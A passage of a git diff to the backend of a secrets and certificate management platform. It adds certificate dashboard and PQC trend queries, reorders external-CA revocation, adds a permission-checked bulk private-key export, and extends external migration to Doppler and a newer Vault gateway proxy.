as period`, [truncUnit, dateFormat]); + + const issued = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .where(`${TableName.Certificate}.notBefore`, ">=", startDate) + .where(`${TableName.Certificate}.notBefore`, "<=", now) + .select(periodExpr("notBefore")) + .select(db.raw("count(*)::int as count")) + .groupBy("period") + .orderBy("period"); + + const expired = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .where(`${TableName.Certificate}.notAfter`, ">=", startDate) + .where(`${TableName.Certificate}.notAfter`, "<=", now) + .where(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED) + .select(periodExpr("notAfter")) + .select(db.raw("count(*)::int as count")) + .groupBy("period") + .orderBy("period"); + + const revoked = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .where(`${TableName.Certificate}.status`, CertStatus.REVOKED) + .where(`${TableName.Certificate}.revokedAt`, ">=", startDate) + .where(`${TableName.Certificate}.revokedAt`, "<=", now) + .select(periodExpr("revokedAt")) + .select(db.raw("count(*)::int as count")) + .groupBy("period") + .orderBy("period"); + + const renewed = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .whereNotNull(`${TableName.Certificate}.renewedFromCertificateId`) + 
.where(`${TableName.Certificate}.notBefore`, ">=", startDate) + .where(`${TableName.Certificate}.notBefore`, "<=", now) + .select(periodExpr("notBefore")) + .select(db.raw("count(*)::int as count")) + .groupBy("period") + .orderBy("period"); + + const periods: Array<{ + period: string; + issued: number; + expired: number; + revoked: number; + renewed: number; + }> = []; + interface PeriodCount { + period: string; + count: string; + } + + const typedIssued = issued as unknown as PeriodCount[]; + const typedExpired = expired as unknown as PeriodCount[]; + const typedRevoked = revoked as unknown as PeriodCount[]; + const typedRenewed = renewed as unknown as PeriodCount[]; + + const issuedMap = new Map(typedIssued.map((r) => [r.period, r.count])); + const expiredMap = new Map(typedExpired.map((r) => [r.period, r.count])); + const revokedMap = new Map(typedRevoked.map((r) => [r.period, r.count])); + const renewedMap = new Map(typedRenewed.map((r) => [r.period, r.count])); + + const cursor = new Date(startDate); + while (cursor <= now) { + let periodKey: string; + if (useDaily) { + periodKey = `${cursor.getFullYear()}-${String(cursor.getMonth() + 1).padStart(2, "0")}-${String(cursor.getDate()).padStart(2, "0")}`; + } else { + periodKey = `${cursor.getFullYear()}-${String(cursor.getMonth() + 1).padStart(2, "0")}`; + } + const issuedCount = issuedMap.get(periodKey); + const expiredCount = expiredMap.get(periodKey); + const revokedCount = revokedMap.get(periodKey); + const renewedCount = renewedMap.get(periodKey); + periods.push({ + period: periodKey, + issued: issuedCount ? Number(issuedCount) : 0, + expired: expiredCount ? Number(expiredCount) : 0, + revoked: revokedCount ? Number(revokedCount) : 0, + renewed: renewedCount ? 
Number(renewedCount) : 0 + }); + if (useDaily) { + cursor.setDate(cursor.getDate() + 1); + } else { + cursor.setMonth(cursor.getMonth() + 1); + } + } + + return { periods }; + } catch (error) { + throw new DatabaseError({ error, name: "Get activity trend" }); + } + }; + + const getPqcTrend = async (projectId: string, daysBack: number) => { + try { + const startDate = new Date(); + startDate.setDate(startDate.getDate() - daysBack); + startDate.setHours(0, 0, 0, 0); + const now = new Date(); + + const useDaily = daysBack <= 30; + if (!useDaily) { + startDate.setDate(1); + } + const truncUnit = useDaily ? "day" : "month"; + const dateFormat = useDaily ? "YYYY-MM-DD" : "YYYY-MM"; + + const rows = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .where(`${TableName.Certificate}.notBefore`, ">=", startDate) + .where(`${TableName.Certificate}.notBefore`, "<=", now) + .whereIn(`${TableName.Certificate}.keyAlgorithm`, [...PQC_KEY_ALGORITHMS, ...NON_PQC_KEY_ALGORITHMS]) + .select( + db.raw(`to_char(date_trunc(?, "${TableName.Certificate}"."notBefore"), ?) 
as period`, [truncUnit, dateFormat]) + ) + .select( + db.raw( + `CASE WHEN "${TableName.Certificate}"."keyAlgorithm" IN (${PQC_KEY_ALGORITHMS.map(() => "?").join(",")}) THEN 'pqc' ELSE 'nonPqc' END as bucket`, + [...PQC_KEY_ALGORITHMS] + ) + ) + .select(db.raw("count(*)::int as count")) + .groupBy("period", "bucket") + .orderBy("period"); + + interface PeriodBucketCount { + period: string; + bucket: "pqc" | "nonPqc"; + count: string; + } + const typed = rows as unknown as PeriodBucketCount[]; + const pqcMap = new Map(); + const nonPqcMap = new Map(); + typed.forEach((r) => { + if (r.bucket === "pqc") pqcMap.set(r.period, Number(r.count)); + else nonPqcMap.set(r.period, Number(r.count)); + }); + + const periods: Array<{ period: string; pqc: number; nonPqc: number }> = []; + const cursor = new Date(startDate); + while (cursor <= now) { + const periodKey = useDaily + ? `${cursor.getFullYear()}-${String(cursor.getMonth() + 1).padStart(2, "0")}-${String(cursor.getDate()).padStart(2, "0")}` + : `${cursor.getFullYear()}-${String(cursor.getMonth() + 1).padStart(2, "0")}`; + periods.push({ + period: periodKey, + pqc: pqcMap.get(periodKey) ?? 0, + nonPqc: nonPqcMap.get(periodKey) ?? 
0 + }); + if (useDaily) { + cursor.setDate(cursor.getDate() + 1); + } else { + cursor.setMonth(cursor.getMonth() + 1); + } + } + + return { periods }; + } catch (error) { + throw new DatabaseError({ error, name: "Get PQC trend" }); + } + }; + return { ...certificateOrm, countCertificatesInProject, @@ -578,6 +1017,9 @@ export const certificateDALFactory = (db: TDbClient) => { findActiveCertificatesForSync, findCertificatesEligibleForRenewal, findWithPrivateKeyInfo, - findWithFullDetails + findWithFullDetails, + getDashboardStats, + getActivityTrend, + getPqcTrend }; }; diff --git a/backend/src/services/certificate/certificate-fns.ts b/backend/src/services/certificate/certificate-fns.ts index 5441bd615d7..19dde4fae07 100644 --- a/backend/src/services/certificate/certificate-fns.ts +++ b/backend/src/services/certificate/certificate-fns.ts @@ -8,6 +8,7 @@ import { BadRequestError, NotFoundError } from "@app/lib/errors"; import { parseDistinguishedName } from "../certificate-authority/certificate-authority-fns"; import { getProjectKmsCertificateKeyId } from "../project/project-fns"; import { + CertKeyAlgorithm, CrlReason, TCertificateFingerprints, TCertificateSubject, @@ -15,6 +16,18 @@ import { TParsedCertificateBody } from "./certificate-types"; +export const keySizeToAlgorithms = (keySize: number): string[] => { + const map: Record = { + 2048: [CertKeyAlgorithm.RSA_2048], + 3072: [CertKeyAlgorithm.RSA_3072], + 4096: [CertKeyAlgorithm.RSA_4096], + 256: [CertKeyAlgorithm.ECDSA_P256], + 384: [CertKeyAlgorithm.ECDSA_P384], + 521: [CertKeyAlgorithm.ECDSA_P521] + }; + return map[keySize] ?? 
[]; +}; + export const revocationReasonToCrlCode = (crlReason: CrlReason) => { switch (crlReason) { case CrlReason.KEY_COMPROMISE: diff --git a/backend/src/services/certificate/certificate-service.ts b/backend/src/services/certificate/certificate-service.ts index 0c50497be8a..2c0a6c2920e 100644 --- a/backend/src/services/certificate/certificate-service.ts +++ b/backend/src/services/certificate/certificate-service.ts @@ -388,6 +388,20 @@ export const certificateServiceFactory = ({ if (cert.status === CertStatus.REVOKED) throw new Error("Certificate already revoked"); + // Call the upstream CA first so we don't end up with a cert that's revoked locally but still + // active at the issuer (e.g., when the upstream rejects the chosen revocation reason). + if ( + ca.externalCa?.type === CaType.AWS_PCA || + ca.externalCa?.type === CaType.AWS_ACM_PUBLIC_CA || + ca.externalCa?.type === CaType.DIGICERT + ) { + await certificateAuthorityService.revokeCertificate({ + caId: ca.id, + serialNumber: cert.serialNumber, + reason: revocationReason + }); + } + const revokedAt = new Date(); await certificateDAL.update( { @@ -407,17 +421,6 @@ export const certificateServiceFactory = ({ pkiSyncQueue }); - // Note: External CA revocation handling would go here for supported CA types - // Currently, only internal CAs, ACME CAs and AWS PCA (external CA) support revocation - - if (ca.externalCa?.type === CaType.AWS_PCA) { - await certificateAuthorityService.revokeCertificate({ - caId: ca.id, - serialNumber: cert.serialNumber, - reason: revocationReason - }); - } - // rebuild CRL (TODO: move to interval-based cron job) // Only rebuild CRL for internal CAs - external CAs manage their own CRLs if (!ca.externalCa?.id) { diff --git a/backend/src/services/cmek/cmek-service.ts b/backend/src/services/cmek/cmek-service.ts index 2acc95ee6d9..0a176ebf212 100644 --- a/backend/src/services/cmek/cmek-service.ts +++ b/backend/src/services/cmek/cmek-service.ts @@ -3,11 +3,12 @@ import { ForbiddenError } 
from "@casl/ability"; import { ActionProjectType } from "@app/db/schemas"; import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { ProjectPermissionCmekActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; -import { SigningAlgorithm } from "@app/lib/crypto/sign"; +import { AsymmetricKeyAlgorithm, SigningAlgorithm, signingService } from "@app/lib/crypto/sign"; import { DatabaseErrorCode } from "@app/lib/error-codes"; import { BadRequestError, DatabaseError, NotFoundError } from "@app/lib/errors"; import { OrgServiceActor } from "@app/lib/types"; import { + TCmekBulkGetPrivateKeysDTO, TCmekDecryptDTO, TCmekEncryptDTO, TCmekGetPrivateKeyDTO, @@ -318,6 +319,79 @@ export const cmekServiceFactory = ({ kmsService, kmsDAL, permissionService }: TC }; }; + const bulkGetPrivateKeys = async ({ keyIds }: TCmekBulkGetPrivateKeysDTO, actor: OrgServiceActor) => { + if (keyIds.length === 0) throw new BadRequestError({ message: "At least one key ID is required" }); + + const uniqueKeyIds = [...new Set(keyIds)]; + const keys = await kmsDAL.findCmeksByIds(uniqueKeyIds); + + if (keys.length === 0) throw new NotFoundError({ message: "No keys found for the provided IDs" }); + + if (keys.length !== uniqueKeyIds.length) { + const foundIds = new Set(keys.map((k) => k.id)); + const missingIds = uniqueKeyIds.filter((id) => !foundIds.has(id)); + throw new NotFoundError({ message: `Keys not found for IDs: ${missingIds.join(", ")}` }); + } + + const projectIds = new Set(); + for (const key of keys) { + if (!key.projectId || key.isReserved) + throw new BadRequestError({ message: `Key with ID "${key.id}" is not customer managed` }); + if (key.isDisabled) throw new BadRequestError({ message: `Key with ID "${key.id}" is disabled` }); + projectIds.add(key.projectId); + } + + if (projectIds.size > 1) throw new BadRequestError({ message: "All keys must belong to the same project" }); + + const projectId = 
keys[0].projectId!; + + const { permission } = await permissionService.getProjectPermission({ + actor: actor.type, + actorId: actor.id, + projectId, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId, + actionProjectType: ActionProjectType.KMS + }); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionCmekActions.ExportPrivateKey, + ProjectPermissionSub.Cmek + ); + + const bulkMaterials = await kmsService.getBulkKeyMaterial({ kmsIds: keys.map((k) => k.id) }); + + const materialByKmsId = new Map(bulkMaterials.map((m) => [m.kmsId, m])); + const asymmetricAlgorithms = new Set(Object.values(AsymmetricKeyAlgorithm)); + + const result = keys.map((key) => { + const materialEntry = materialByKmsId.get(key.id); + + if (!materialEntry) { + throw new NotFoundError({ message: `Key material not found for key ID "${key.id}"` }); + } + + let publicKey: string | undefined; + if (asymmetricAlgorithms.has(key.encryptionAlgorithm)) { + const pubKeyBuffer = signingService( + key.encryptionAlgorithm as AsymmetricKeyAlgorithm + ).getPublicKeyFromPrivateKey(materialEntry.keyMaterial); + publicKey = pubKeyBuffer.toString("base64"); + } + + return { + keyId: key.id, + name: key.name, + keyUsage: key.keyUsage, + algorithm: key.encryptionAlgorithm, + privateKey: materialEntry.keyMaterial.toString("base64"), + ...(publicKey ? 
{ publicKey } : {}) + }; + }); + + return { keys: result, projectId }; + }; + const cmekSign = async ({ keyId, data, signingAlgorithm, isDigest }: TCmekSignDTO, actor: OrgServiceActor) => { const key = await kmsDAL.findCmekById(keyId); @@ -432,6 +506,7 @@ export const cmekServiceFactory = ({ kmsService, kmsDAL, permissionService }: TC cmekVerify, listSigningAlgorithms, getPublicKey, - getPrivateKey + getPrivateKey, + bulkGetPrivateKeys }; }; diff --git a/backend/src/services/cmek/cmek-types.ts b/backend/src/services/cmek/cmek-types.ts index eafd39e39fa..d1b3267182c 100644 --- a/backend/src/services/cmek/cmek-types.ts +++ b/backend/src/services/cmek/cmek-types.ts @@ -57,6 +57,10 @@ export type TCmekGetPrivateKeyDTO = { keyId: string; }; +export type TCmekBulkGetPrivateKeysDTO = { + keyIds: string[]; +}; + export type TCmekSignDTO = { keyId: string; data: string; diff --git a/backend/src/services/enrollment-config/enrollment-config-types.ts b/backend/src/services/enrollment-config/enrollment-config-types.ts index badf981a17a..afc31220b99 100644 --- a/backend/src/services/enrollment-config/enrollment-config-types.ts +++ b/backend/src/services/enrollment-config/enrollment-config-types.ts @@ -52,7 +52,10 @@ export type TScepEnrollmentConfigInsert = TPkiScepEnrollmentConfigsInsert; export type TScepEnrollmentConfigUpdate = TPkiScepEnrollmentConfigsUpdate; export interface TScepConfigData { - challengePassword: string; + challengeType?: string; + challengePassword?: string; includeCaCertInResponse?: boolean; allowCertBasedRenewal?: boolean; + dynamicChallengeExpiryMinutes?: number; + dynamicChallengeMaxPending?: number; } diff --git a/backend/src/services/external-migration/external-migration-config-dal.ts b/backend/src/services/external-migration/external-migration-config-dal.ts new file mode 100644 index 00000000000..1f0d11361d0 --- /dev/null +++ b/backend/src/services/external-migration/external-migration-config-dal.ts @@ -0,0 +1,92 @@ +import { Knex } from "knex"; + 
+import { TDbClient } from "@app/db"; +import { TableName, TExternalMigrationConfigs } from "@app/db/schemas"; +import { DatabaseError } from "@app/lib/errors"; +import { buildFindFilter, ormify, prependTableNameToFindFilter, selectAllTableCols } from "@app/lib/knex"; + +export type TExternalMigrationConfigDALFactory = ReturnType; + +const buildConnectionJoin = (qb: Knex.QueryBuilder, db: TDbClient) => + qb + .leftJoin( + TableName.AppConnection, + `${TableName.AppConnection}.id`, + `${TableName.ExternalMigrationConfig}.connectionId` + ) + .select(selectAllTableCols(TableName.ExternalMigrationConfig)) + .select( + db.ref("id").withSchema(TableName.AppConnection).as("appConnectionId"), + db.ref("name").withSchema(TableName.AppConnection).as("appConnectionName"), + db.ref("app").withSchema(TableName.AppConnection).as("appConnectionApp"), + db.ref("encryptedCredentials").withSchema(TableName.AppConnection).as("appConnectionEncryptedCredentials"), + db.ref("orgId").withSchema(TableName.AppConnection).as("appConnectionOrgId"), + db.ref("isAutoRotationEnabled").withSchema(TableName.AppConnection).as("appConnectionIsAutoRotationEnabled"), + db.ref("method").withSchema(TableName.AppConnection).as("appConnectionMethod"), + db.ref("description").withSchema(TableName.AppConnection).as("appConnectionDescription"), + db.ref("version").withSchema(TableName.AppConnection).as("appConnectionVersion"), + db.ref("gatewayId").withSchema(TableName.AppConnection).as("appConnectionGatewayId"), + db.ref("projectId").withSchema(TableName.AppConnection).as("appConnectionProjectId"), + db.ref("createdAt").withSchema(TableName.AppConnection).as("appConnectionCreatedAt"), + db.ref("updatedAt").withSchema(TableName.AppConnection).as("appConnectionUpdatedAt") + ); + +const mapResultToConnection = (raw: Record) => { + const result = raw as TExternalMigrationConfigs & Record; + return { + ...result, + connection: raw.appConnectionId + ? 
{ + id: raw.appConnectionId as string, + name: raw.appConnectionName as string, + app: raw.appConnectionApp, + encryptedCredentials: raw.appConnectionEncryptedCredentials as Buffer, + orgId: raw.appConnectionOrgId as string, + method: raw.appConnectionMethod, + description: raw.appConnectionDescription, + version: raw.appConnectionVersion, + gatewayId: raw.appConnectionGatewayId, + projectId: raw.appConnectionProjectId, + createdAt: raw.appConnectionCreatedAt as Date, + updatedAt: raw.appConnectionUpdatedAt as Date, + isAutoRotationEnabled: raw.appConnectionIsAutoRotationEnabled as boolean + } + : undefined + }; +}; + +export const externalMigrationConfigDALFactory = (db: TDbClient) => { + const orm = ormify(db, TableName.ExternalMigrationConfig); + + const findOne = async (filter: { orgId: string; provider?: string; connectionId?: string | null }, tx?: Knex) => { + try { + const qb = buildConnectionJoin((tx || db?.replicaNode?.() || db)(TableName.ExternalMigrationConfig), db); + /* eslint-disable @typescript-eslint/no-misused-promises */ + void qb.where(buildFindFilter(prependTableNameToFindFilter(TableName.ExternalMigrationConfig, filter))); + /* eslint-enable @typescript-eslint/no-misused-promises */ + + const result = (await qb.first()) as Record | undefined; + if (!result) return undefined; + + return mapResultToConnection(result); + } catch (error) { + throw new DatabaseError({ error, name: "Find one" }); + } + }; + + const findWithConnection = async (filter: { orgId: string; provider?: string }, tx?: Knex) => { + try { + const qb = buildConnectionJoin((tx || db?.replicaNode?.() || db)(TableName.ExternalMigrationConfig), db); + /* eslint-disable @typescript-eslint/no-misused-promises */ + void qb.where(buildFindFilter(prependTableNameToFindFilter(TableName.ExternalMigrationConfig, filter))); + /* eslint-enable @typescript-eslint/no-misused-promises */ + + const results = (await qb) as Record[]; + return results.map(mapResultToConnection); + } catch (error) { 
+ throw new DatabaseError({ error, name: "Find with connection" }); + } + }; + + return { ...orm, findOne, findWithConnection }; +}; diff --git a/backend/src/services/external-migration/external-migration-fns/doppler.ts b/backend/src/services/external-migration/external-migration-fns/doppler.ts new file mode 100644 index 00000000000..4df23878798 --- /dev/null +++ b/backend/src/services/external-migration/external-migration-fns/doppler.ts @@ -0,0 +1,8 @@ +// Re-export Doppler API helpers for use in the migration service. +// The actual implementation lives in the Doppler AppConnection package. +export { + getDopplerSecrets, + listDopplerConfigs, + listDopplerEnvironments, + listDopplerProjects +} from "@app/services/app-connection/doppler/doppler-connection-fns"; diff --git a/backend/src/services/external-migration/external-migration-fns/index.ts b/backend/src/services/external-migration/external-migration-fns/index.ts index 4af82bf2285..a7e60cabc47 100644 --- a/backend/src/services/external-migration/external-migration-fns/index.ts +++ b/backend/src/services/external-migration/external-migration-fns/index.ts @@ -1,3 +1,4 @@ +export * from "./doppler"; export * from "./envkey"; export * from "./import"; export * from "./vault"; diff --git a/backend/src/services/external-migration/external-migration-fns/vault.ts b/backend/src/services/external-migration/external-migration-fns/vault.ts index e84284cdc1e..6e32be90759 100644 --- a/backend/src/services/external-migration/external-migration-fns/vault.ts +++ b/backend/src/services/external-migration/external-migration-fns/vault.ts @@ -1,11 +1,13 @@ import https from "node:https"; -import axios, { AxiosInstance } from "axios"; +import axios, { AxiosInstance, isAxiosError } from "axios"; import { v4 as uuidv4 } from "uuid"; import { TGatewayServiceFactory } from "@app/ee/services/gateway/gateway-service"; +import { TGatewayV2ServiceFactory } from "@app/ee/services/gateway-v2/gateway-v2-service"; import { BadRequestError } 
from "@app/lib/errors"; import { GatewayProxyProtocol, withGatewayProxy } from "@app/lib/gateway"; +import { withGatewayV2Proxy } from "@app/lib/gateway-v2/gateway-v2"; import { logger } from "@app/lib/logger"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; @@ -18,31 +20,50 @@ type VaultData = { secretData: Record; }; -const vaultFactory = (gatewayService: Pick) => { +const vaultFactory = ( + gatewayService: Pick, + gatewayV2Service: Pick +) => { const $gatewayProxyWrapper = async ( inputs: { gatewayId: string; - targetHost?: string; - targetPort?: number; + targetProtocol: string; + targetHostname: string; + targetPort: number; }, - gatewayCallback: (host: string, port: number, httpsAgent?: https.Agent) => Promise + gatewayCallback: (host: string, port: number, httpsAgent?: https.Agent, hostHeader?: string) => Promise ): Promise => { - const relayDetails = await gatewayService.fnGetGatewayClientTlsByGatewayId(inputs.gatewayId); - - const callbackResult = await withGatewayProxy( - async (port, httpsAgent) => { - const res = await gatewayCallback("http://localhost", port, httpsAgent); - return res; - }, - { - protocol: GatewayProxyProtocol.Http, - targetHost: inputs.targetHost, - targetPort: inputs.targetPort, - relayDetails - } - ); + const { gatewayId, targetProtocol, targetHostname, targetPort } = inputs; + + const gatewayV2Details = await gatewayV2Service.getPlatformConnectionDetailsByGatewayId({ + gatewayId, + targetHost: targetHostname, + targetPort + }); - return callbackResult; + if (gatewayV2Details) { + const isHttps = targetProtocol === "https"; + const httpsAgent = isHttps ? 
new https.Agent({ servername: targetHostname }) : undefined; + + return withGatewayV2Proxy( + async (port) => gatewayCallback(`${targetProtocol}://localhost`, port, httpsAgent, targetHostname), + { + protocol: GatewayProxyProtocol.Tcp, + relayHost: gatewayV2Details.relayHost, + gateway: gatewayV2Details.gateway, + relay: gatewayV2Details.relay + } + ); + } + + const relayDetails = await gatewayService.fnGetGatewayClientTlsByGatewayId(gatewayId); + + return withGatewayProxy(async (port, httpsAgent) => gatewayCallback("http://localhost", port, httpsAgent), { + protocol: GatewayProxyProtocol.Http, + targetHost: `${targetProtocol}://${targetHostname}`, + targetPort, + relayDetails + }); }; const getMounts = async (request: AxiosInstance) => { @@ -51,7 +72,7 @@ const vaultFactory = (gatewayService: Pick; }>("/v1/sys/mounts") .catch((err) => { - if (axios.isAxiosError(err)) { + if (isAxiosError(err)) { logger.error(err.response?.data, "External migration: Failed to get Vault mounts"); } throw err; @@ -87,7 +108,7 @@ const vaultFactory = (gatewayService: Pick(`/v1/${mountPath}/data/${secretPath}`) .catch((err) => { - if (axios.isAxiosError(err)) { + if (isAxiosError(err)) { // handle soft-deleted secrets (Vault returns 404 with metadata for soft deleted secrets) const vaultResponse = err.response?.data as { data?: { metadata?: { deletion_time?: string } } }; @@ -152,7 +173,7 @@ const vaultFactory = (gatewayService: Pick(`/v1/${mountPath}/${secretPath}`) .catch((err) => { - if (axios.isAxiosError(err)) { + if (isAxiosError(err)) { logger.error(err.response?.data, "External migration: Failed to get Vault secret"); } throw err; @@ -208,15 +229,17 @@ const vaultFactory = (gatewayService: Pick { - const getData = async (host: string, port?: number, httpsAgent?: https.Agent) => { + const getData = async (host: string, port?: number, httpsAgent?: https.Agent, hostHeader?: string) => { const allData: VaultData[] = []; const request = axios.create({ baseURL: port ? 
`${host}:${port}` : host, headers: { "X-Vault-Token": accessToken, - ...(namespace ? { "X-Vault-Namespace": namespace } : {}) + ...(namespace ? { "X-Vault-Namespace": namespace } : {}), + ...(hostHeader ? { Host: hostHeader } : {}) }, + maxRedirects: 0, httpsAgent }); @@ -279,12 +302,14 @@ const vaultFactory = (gatewayService: Pick } + { + gatewayService, + gatewayV2Service + }: { + gatewayService: Pick; + gatewayV2Service: Pick; + } ) => { await blockLocalAndPrivateIpAddresses(vaultUrl); @@ -559,7 +590,7 @@ export const importVaultDataFn = async ( `[importVaultDataFn]: Running ${orgId in vaultMigrationTransformMappings ? "custom" : "default"} transform` ); - const vaultApi = vaultFactory(gatewayService); + const vaultApi = vaultFactory(gatewayService, gatewayV2Service); const vaultData = await vaultApi.collectVaultData({ accessToken: vaultAccessToken, diff --git a/backend/src/services/external-migration/external-migration-schemas.ts b/backend/src/services/external-migration/external-migration-schemas.ts new file mode 100644 index 00000000000..ae16ba3b369 --- /dev/null +++ b/backend/src/services/external-migration/external-migration-schemas.ts @@ -0,0 +1,26 @@ +import { z } from "zod"; + +export enum ExternalMigrationProviders { + Vault = "vault", + EnvKey = "env-key", + Doppler = "doppler" +} + +export const ExternalMigrationConfigVaultConfigSchema = z.object({ + namespace: z.string() +}); + +export const ExternalMigrationConfigDopplerConfigSchema = z.object({}); + +export const ExternalMigrationConfigSchema = z.discriminatedUnion("provider", [ + z.object({ + provider: z.literal(ExternalMigrationProviders.Vault), + config: ExternalMigrationConfigVaultConfigSchema + }), + z.object({ + provider: z.literal(ExternalMigrationProviders.Doppler), + config: ExternalMigrationConfigDopplerConfigSchema + }) +]); + +export type TExternalMigrationConfig = z.infer; diff --git a/backend/src/services/external-migration/external-migration-service.ts 
b/backend/src/services/external-migration/external-migration-service.ts index d9c13f4f2e4..11084e992bf 100644 --- a/backend/src/services/external-migration/external-migration-service.ts +++ b/backend/src/services/external-migration/external-migration-service.ts @@ -10,14 +10,14 @@ import { TGatewayServiceFactory } from "@app/ee/services/gateway/gateway-service import { TGatewayV2ServiceFactory } from "@app/ee/services/gateway-v2/gateway-v2-service"; import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { crypto } from "@app/lib/crypto/cryptography"; -import { DatabaseErrorCode } from "@app/lib/error-codes"; -import { BadRequestError, DatabaseError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; +import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; import { GatewayVersion } from "@app/lib/gateway/types"; import { OrgServiceActor } from "@app/lib/types"; import { AppConnection } from "../app-connection/app-connection-enums"; import { decryptAppConnectionCredentials } from "../app-connection/app-connection-fns"; import { TAppConnectionServiceFactory } from "../app-connection/app-connection-service"; +import { TDopplerConnection } from "../app-connection/doppler"; import { convertVaultValueToString, getHCVaultAuthMounts, @@ -27,8 +27,9 @@ import { getHCVaultKubernetesRoles, getHCVaultLdapRoles, getHCVaultPolicyNames, - getHCVaultSecretsForPath, + getHCVaultSecretsForPaths, HCVaultAuthType, + JsonValue, listHCVaultMounts, listHCVaultPolicies, listHCVaultSecretPaths, @@ -36,28 +37,34 @@ import { THCVaultConnection } from "../app-connection/hc-vault"; import { TKmsServiceFactory } from "../kms/kms-service"; +import { KmsDataKey } from "../kms/kms-types"; import { TSecretServiceFactory } from "../secret/secret-service"; import { SecretProtectionType } from "../secret/secret-types"; import { TUserDALFactory } from "../user/user-dal"; +import { 
TExternalMigrationConfigDALFactory } from "./external-migration-config-dal"; import { decryptEnvKeyDataFn, + getDopplerSecrets, importVaultDataFn, + listDopplerConfigs, + listDopplerEnvironments, + listDopplerProjects, parseEnvKeyDataFn, vaultMigrationTransformMappings } from "./external-migration-fns"; import { TExternalMigrationQueueFactory } from "./external-migration-queue"; +import { ExternalMigrationConfigVaultConfigSchema, ExternalMigrationProviders } from "./external-migration-schemas"; import { - ExternalMigrationProviders, + ExternalMigrationImportStatus, ExternalPlatforms, - TCreateVaultExternalMigrationDTO, - TDeleteVaultExternalMigrationDTO, + TCreateExternalMigrationDTO, + TDeleteExternalMigrationDTO, THasCustomVaultMigrationDTO, + TImportDopplerSecretsDTO, TImportEnvKeyDataDTO, TImportVaultDataDTO, - TUpdateVaultExternalMigrationDTO, - VaultImportStatus + TUpdateExternalMigrationDTO } from "./external-migration-types"; -import { TVaultExternalMigrationConfigDALFactory } from "./vault-external-migration-config-dal"; type TExternalMigrationServiceFactoryDep = { permissionService: TPermissionServiceFactory; @@ -65,9 +72,9 @@ type TExternalMigrationServiceFactoryDep = { auditLogService: Pick; externalMigrationQueue: TExternalMigrationQueueFactory; appConnectionService: Pick; - vaultExternalMigrationConfigDAL: Pick< - TVaultExternalMigrationConfigDALFactory, - "create" | "findOne" | "transaction" | "find" | "updateById" | "deleteById" | "findById" + externalMigrationConfigDAL: Pick< + TExternalMigrationConfigDALFactory, + "create" | "findOne" | "transaction" | "find" | "updateById" | "deleteById" | "findById" | "findWithConnection" >; userDAL: Pick; gatewayService: Pick; @@ -86,7 +93,7 @@ export const externalMigrationServiceFactory = ({ secretService, auditLogService, appConnectionService, - vaultExternalMigrationConfigDAL, + externalMigrationConfigDAL, kmsService }: TExternalMigrationServiceFactoryDep) => { const getGatewayDetails = async (connection: 
THCVaultConnection) => { @@ -153,28 +160,44 @@ export const externalMigrationServiceFactory = ({ throw new ForbiddenRequestError({ message: `Only admins can ${action}` }); } - const vaultConfig = await vaultExternalMigrationConfigDAL.findOne({ + const existingConfig = await externalMigrationConfigDAL.findWithConnection({ orgId: actor.orgId, - namespace + provider: ExternalMigrationProviders.Vault }); - if (!vaultConfig) { + const { decryptor } = await kmsService.createCipherPairWithDataKey({ + type: KmsDataKey.Organization, + orgId: actor.orgId + }); + + const migrationConfig = existingConfig + .map((config) => { + const decryptedConfig = decryptor({ cipherTextBlob: config.encryptedConfig }); + + return { + ...config, + config: ExternalMigrationConfigVaultConfigSchema.parse(JSON.parse(decryptedConfig.toString())) + }; + }) + .find((config) => config.config.namespace === namespace); + + if (!migrationConfig) { throw new NotFoundError({ message: "Vault migration config not found for this namespace" }); } - if (!vaultConfig.connection) { + if (!migrationConfig.connection) { throw new BadRequestError({ message: "Vault migration connection is not configured for this namespace" }); } const credentials = await decryptAppConnectionCredentials({ - orgId: vaultConfig.orgId, - encryptedCredentials: vaultConfig.connection.encryptedCredentials, + orgId: migrationConfig.orgId, + encryptedCredentials: migrationConfig.connection?.encryptedCredentials, kmsService, projectId: null }); return { - ...vaultConfig.connection, + ...migrationConfig.connection, credentials } as THCVaultConnection; }; @@ -264,7 +287,8 @@ export const externalMigrationServiceFactory = ({ orgId: actorOrgId }, { - gatewayService + gatewayService, + gatewayV2Service } ); @@ -325,6 +349,13 @@ export const externalMigrationServiceFactory = ({ connection: THCVaultConnection; namespace: string; }) => { + if (connection.projectId != null) { + throw new BadRequestError({ + message: + "Vault external migration 
